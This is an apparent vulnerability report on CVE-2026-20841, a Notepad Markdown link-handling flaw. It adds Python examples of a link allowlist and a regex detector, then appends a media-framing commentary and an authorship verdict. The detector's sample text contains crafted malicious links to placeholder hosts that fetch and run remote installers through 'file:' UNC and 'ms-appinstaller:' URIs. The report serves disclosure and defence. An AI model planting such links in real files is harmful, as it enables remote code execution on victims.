In this excerpt of a TrendAI Research Services vulnerability report, Nikolai Skliarenko and Yazhi Wang of the TrendAI Research team detail a recently patched command injection vulnerability in the Windows Notepad application. This bug was originally discovered by Cristian Papa and Alasdair Gorniak of Delta Obscura. Successful exploitation of this vulnerability could result in the execution of arbitrary commands in the security context of the victim's account. The following is a portion of their write-up covering CVE-2026-20841, with a few minimal modifications.
A remote code execution vulnerability has been reported in Microsoft Windows Notepad. The vulnerability is due to improper validation of links in Markdown files.
A remote attacker could exploit this vulnerability by enticing the victim to download and interact with a malicious file. Successful exploitation of this vulnerability could result in the execution of arbitrary commands in the security context of the victim's account.
The Vulnerability
Microsoft Windows comes with a default text-editing application called Windows Notepad. Historically, this application offered only minimal editing features. However, modern versions of Windows include an improved and extended Notepad by default. This new version supports multiple file formats, Markdown rendering, and Copilot-enhanced features.
Markdown is a lightweight markup language that allows users to create formatted text using a simple syntax. It is widely used for writing documents, blog posts, and README files. It supports a wide range of formatting options, including (but not limited to) headers, styled text, numbered and bulleted lists, and links. Markdown supports two main link formats: inline links and autolinks. The inline link format is:
[link-name](link/path)
When rendered, only the link text ("link-name") is shown to the user; the target ("link/path") is hidden.
Autolinks wrap the bare target in angle brackets:
<link/path>
When rendered, they are treated as the equivalent inline link whose text is the target itself:
[link/path](link/path)
A remote code execution vulnerability has been reported in Microsoft Windows Notepad. The vulnerability is due to improper validation of links when handling Markdown files.
When Notepad opens a file, if the application detects that the file requires special rendering (in this case, Markdown), the input file is tokenized. Tokenization in this context means splitting the raw file text into a sequence of small, recognizable pieces ("tokens") that the renderer can process one by one. Detection is based on the file extension: the application calls sub_1400ED5D0(), which uses a fixed string comparison, and only the ".md" extension was found to trigger Markdown rendering. Markdown files are rendered token by token.
Function sub_140170F60() handles clicking on links in Markdown files. It filters the link value and passes it to the ShellExecuteExW() call.
The filtering performed on the link is insufficient: it allows maliciously crafted protocol URIs, such as "file://" and "ms-appinstaller://", to execute arbitrary files in the security context of the victim. ShellExecuteExW() dispatches to the protocol handlers configured on the system and may therefore expose additional exploitable protocols depending on the system configuration.
A remote attacker could exploit this vulnerability by enticing the victim to download a maliciously crafted Markdown file, open it in Notepad, and click on a malicious link. Successful exploitation of this vulnerability could result in the execution of arbitrary commands in the security context of the victim's account.
Notes
• Files using the ".md" file extension are not registered to be opened by Notepad by default. However, when opened manually in Notepad, they are rendered as Markdown, which allows the vulnerability to be triggered.
• Any "\\" sequences are converted to "\" in the attacker-controlled link path prior to passing it to the ShellExecuteExW() call.
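The two notes above matter for anyone writing or reviewing a link filter of this kind: the value must be validated after the "\\" to "\" collapse, because that is the value ShellExecuteExW() receives, and anything that is not explicitly allowed must be refused rather than handed to whatever protocol handler happens to be registered. The following is an added example, not Notepad's code and not the vendor patch. It implements, as a stand-alone validator, the policy the report attributes to the patch (local files and HTTP(S) URIs only); the exact rules of the real patch are not shown on this page, so the treatment of bare drive-letter paths, relative paths and scheme-less values below is this example's own assumption.

```python
"""Illustrative allowlist for a clicked Markdown link target.

Added example, not Notepad's code and not the vendor patch. The policy
(HTTP(S) URIs and local files only) follows the report's description of
the patch; the detailed rules are assumptions of this example.
"""
import re
from urllib.parse import urlsplit

_SCHEME_RE = re.compile(r"^([A-Za-z][A-Za-z0-9+.-]*):(.*)$", re.DOTALL)
# Windows drive-letter path such as C:\Users\... or C:/Users/...
_DRIVE_PATH_RE = re.compile(r"^[A-Za-z]:[\\/]")
ALLOWED_WEB_SCHEMES = ("http", "https")


def normalize_link(raw):
    """Collapse "\\\\" to "\\" as the report says Notepad does.

    Validation must run on this value, since it is the value that would
    reach ShellExecuteExW(), not the raw Markdown text.
    """
    return raw.strip().replace("\\\\", "\\")


def classify_link(raw):
    """Return (allowed, reason) for a clicked Markdown link target."""
    target = normalize_link(raw)

    # Bare drive-letter path (C:\... or C:/...): a local file, allowed.
    # Checked first so the "C:" is not mistaken for a one-letter scheme.
    if _DRIVE_PATH_RE.match(target):
        return True, "local drive-letter path"

    m = _SCHEME_RE.match(target)
    if not m:
        # Relative paths and anything unparseable: refuse instead of letting
        # the shell resolve them (deliberately strict; this example's choice).
        return False, "no recognised URI scheme"

    scheme, rest = m.group(1).lower(), m.group(2)

    if scheme in ALLOWED_WEB_SCHEMES:
        host = urlsplit(target).netloc
        if not host:
            return False, f"{scheme}: URI without a host"
        return True, f"{scheme} URI, opened by the default browser"

    if scheme == "file":
        # file:///C:/x, file://C:/x and file:C:\x all name a local drive path
        # once leading separators are removed; file:////host/share and
        # file:\\\\host\share (after the collapse) leave a host name, i.e.
        # a remote UNC path that ShellExecuteExW() would fetch and run.
        body = rest.lstrip("/\\")
        if _DRIVE_PATH_RE.match(body):
            return True, "file: URI to a local drive path"
        return False, "file: URI to a UNC/remote path"

    # ms-appinstaller: and every other registered handler: not allowlisted.
    return False, f"scheme {scheme!r} not in allowlist; would go to a registered handler"


if __name__ == "__main__":
    # Constructed sample targets; the hostnames are placeholders.
    for link in (
        "https://www.microsoft.com/",
        "file:///C:/Users/Public/notes.txt",
        "file:////share.example.test/public/installer.exe",
        r"file:\\\\\\\\share.example.test\\public\\run.lnk",
        "ms-appinstaller://share.example.test/app.msix",
        "docs/readme.md",
    ):
        print(f"{link!r}: {classify_link(link)}")
```

The order of operations is the point: normalize, then classify the normalized value, and treat "not on the allowlist" as a rejection rather than forwarding to the shell and hoping no dangerous handler is registered.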
Source Code Walkthrough
The following code snippet was taken from Notepad.exe version 11.2508. Comments added by TrendAI researchers have been highlighted.
In sub_140170F60():
Detection Guidance
To detect an attack exploiting this vulnerability, the detection device must monitor and parse traffic on the following application protocols that can be used to deliver an attack to exploit this vulnerability:
• FTP, over ports 21/TCP, 20/TCP
• HTTP, over port 80/TCP
• HTTPS, over port 443/TCP
• IMAP, over port 143/TCP
• NFS, over ports 2049/TCP, 2049/UDP, 111/TCP, 111/UDP
• POP3, over port 110/TCP
• SMTP, over ports 25/TCP, 587/TCP
• SMB/CIFS, over ports 139/TCP, 445/TCP
The detection device must inspect traffic transferring a Markdown file with the file extension ".md". If such a file transfer is found, the detection device must search the file content for links.
The detection device must check whether the link paths contain the strings "file:" or "ms-appinstaller:".
If "file:" was found, the detection device must search the Markdown file contents using the following case-insensitive regular expression:
(\x3C|\[[^\x5d]+\]\()file:(\x2f|\x5c\x5c){4}
If "ms-appinstaller:" was found, the detection device must search the Markdown file contents using the following case-insensitive regular expression:
(\x3C|\[[^\x5d]+\]\()ms-appinstaller:(\x2f|\x5c\x5c){2}
If any of the regular expressions matches, the link contains a path to a remote resource. The traffic must be considered malicious; an attack exploiting this vulnerability is likely underway. This guidance should also detect the public PoC that was recently posted on GitHub.
Notes
• The string matches are case-insensitive.
• The detection guidance is based on the vendor-provided patch. However, the patch restricts links to local-only files and HTTP(S) URIs, and flagging everything the patch now blocks would produce a huge number of false positives. Because of that, the detection guidance focuses only on link formats that can fetch and execute remote files; the trade-off is that links using other schemes are not flagged, so false negatives are possible.
• The vulnerable function uses the configured protocol handlers and may expose additional exploitable protocols depending on the system configuration.
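To make the guidance above concrete, the following is an added example (not part of the original report or of any vendor tooling) that applies the two regular expressions to the contents of a ".md" file, the way a sensor would after reassembling the transfer: the ".md" extension check, the cheap "file:" / "ms-appinstaller:" string pre-checks, then the case-insensitive regexes, reported per line. The sample document is constructed for the example and its hostnames are placeholders; the expressions themselves are copied verbatim from the guidance.

```python
"""Apply the report's detection regexes to Markdown file contents.

Added example, not part of the original report. The two expressions are
copied verbatim from the detection guidance; the sample document and the
hostnames in it are constructed for this example.
"""
import re

# The leading group anchors on either an autolink "<" or the "](" that
# closes the link text of an inline link, so a plain prose mention of
# "file:" does not match. "\x5c\x5c" matches two literal backslashes in the
# raw file, which Notepad collapses to one before calling ShellExecuteExW().
FILE_UNC_RE = re.compile(
    r"(\x3C|\[[^\x5d]+\]\()file:(\x2f|\x5c\x5c){4}", re.IGNORECASE)
APPINSTALLER_RE = re.compile(
    r"(\x3C|\[[^\x5d]+\]\()ms-appinstaller:(\x2f|\x5c\x5c){2}", re.IGNORECASE)


def is_markdown_filename(filename):
    """Only ".md" triggers Markdown rendering in Notepad, per the report.

    The comparison is done case-insensitively here because Windows file
    names are case-insensitive (an assumption of this example)."""
    return filename.lower().endswith(".md")


def scan_markdown(text):
    """Return a list of (rule, line_number, matched_text) findings."""
    lowered = text.lower()
    rules = []
    # Cheap substring checks first, as the guidance describes, so the
    # regexes only run on files that mention the schemes at all.
    if "file:" in lowered:
        rules.append(("file-unc", FILE_UNC_RE))
    if "ms-appinstaller:" in lowered:
        rules.append(("ms-appinstaller", APPINSTALLER_RE))

    findings = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        for name, rx in rules:
            for m in rx.finditer(line):
                findings.append((name, lineno, m.group(0)))
    return findings


def classify_transfer(filename, content):
    """Verdict for one observed file transfer: 'ignore', 'clean' or 'malicious'."""
    if not is_markdown_filename(filename):
        return "ignore"
    return "malicious" if scan_markdown(content) else "clean"


# Constructed sample: a benign web link, a local file: link (not flagged,
# by design), a prose mention (not flagged), and three remote-file links.
SAMPLE_MD = r"""# Release notes (constructed sample)
See [the docs](https://docs.example.test/guide) for details.
Local copy: [notes](file:///C:/Users/Public/notes.txt)
Prose mention of file: and ms-appinstaller: must not trigger by itself.
[Click to open](file:////share.evil.test/public/installer.exe)
<FILE:\\\\\\\\share.evil.test\\public\\run.lnk>
[Install now](ms-appinstaller://share.evil.test/app.msix)
"""

if __name__ == "__main__":
    for finding in scan_markdown(SAMPLE_MD):
        print(finding)
    print(classify_transfer("notes.md", SAMPLE_MD))
```

Note what the local "file:///C:/..." line and the uppercase "FILE:" autolink show: three separators are a local path and stay below the threshold, four separators (or eight raw backslashes) name a UNC host and are flagged, and the match is case-insensitive as the guidance requires.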
Conclusion
This vulnerability was patched by Microsoft in the February 2026 release cycle. They note no workarounds but do list user interaction as a prerequisite to exploitation. To fully remediate the vulnerability, the proper action is to test and deploy the provided vendor patch.
Special thanks to Nikolai Skliarenko and Yazhi Wang of the TrendAI Research team for providing such a thorough analysis of this vulnerability. For an overview of TrendAI Research services please visit https://go.trendmicro.com/tis/vulnerabilities.html
The threat research team will be back with other great vulnerability analysis reports in the future. Until then, follow the team on Twitter, Mastodon, LinkedIn, or Bluesky for the latest in exploit techniques and security patches.
Facts Only
A command injection vulnerability (CVE-2026-20841) was discovered in Microsoft Windows Notepad.
The vulnerability was originally found by Cristian Papa and Alasdair Gorniak of Delta Obscura.
TrendAI Research Services analysts Nikolai Skliarenko and Yazhi Wang provided a detailed analysis.
The flaw involves improper validation of links in Markdown files when rendered by Notepad.
Exploitation requires a victim to open a malicious `.md` file and click a crafted link.
The vulnerability allows arbitrary command execution in the context of the victim's account.
The issue was patched by Microsoft in the February 2026 release cycle.
Notepad's Markdown rendering is triggered only for files with the `.md` extension.
The vulnerable function `sub_140170F60()` processes link clicks and passes the filtered link value to `ShellExecuteExW()`.
Detection involves monitoring file transfers and inspecting Markdown content for "file:" or "ms-appinstaller:" protocols.
The patch restricts links to local files and HTTP(S) URIs; detection built directly on that rule would generate many false positives, so the guidance targets only remote-file schemes and accepts some false negatives.
Executive Summary
Full Take
This vulnerability narrative presents a textbook case of how feature expansion in legacy software can introduce unintended attack surfaces. The strongest version of this story—its steelman—highlights legitimate security research uncovering a non-obvious flaw in a widely used application, with clear technical details and responsible disclosure. The analysis deserves credit for its precision in describing the exploit chain and detection methods.
Pattern-wise, the framing leans toward technical authority without overt manipulation, though the emphasis on "remote code execution" could subtly amplify perceived risk (ARC-0012 Fear Appeal). The detection guidance's acknowledgment of false positives and negatives adds necessary nuance, resisting the temptation to oversimplify. The root cause here is the tension between usability (Markdown support in Notepad) and security (protocol handler validation), a recurring paradigm in software development where convenience often outpaces threat modeling.
The implications extend beyond this single CVE. For human agency, it underscores how even mundane tools can become vectors for exploitation when functionality expands without proportional security scrutiny. The costs are borne by end users who must now patch or risk compromise, while the benefits accrue to security researchers and vendors who strengthen their reputations through responsible disclosure.
Bridge questions: How might Microsoft's shift toward AI-enhanced features (like Copilot integration) introduce similar vulnerabilities in other legacy applications? What trade-offs between functionality and security should users demand from software vendors? Would a more restrictive default file association policy for `.md` files have mitigated this risk?
Counterstrike scan: A coordinated influence campaign exploiting this narrative might weaponize it to erode trust in Microsoft's security practices or push for mandatory patching policies. However, the content here aligns with legitimate security research rather than a manipulative playbook—no forced binaries, no emotional exploitation, just technical analysis. The absence of alarmist language or calls to action suggests healthy alignment with factual reporting.
Patterns detected: ARC-0012 Fear Appeal (minor, in emphasis on "remote code execution")
Sentinel — Human
This TrendAI Research Services vulnerability report shows signs of being written by a human. The article displays slight stylometric deviations, includes personal voice and idiosyncratic emphasis, and provides unique insights and details that are not found verbatim in other sources.
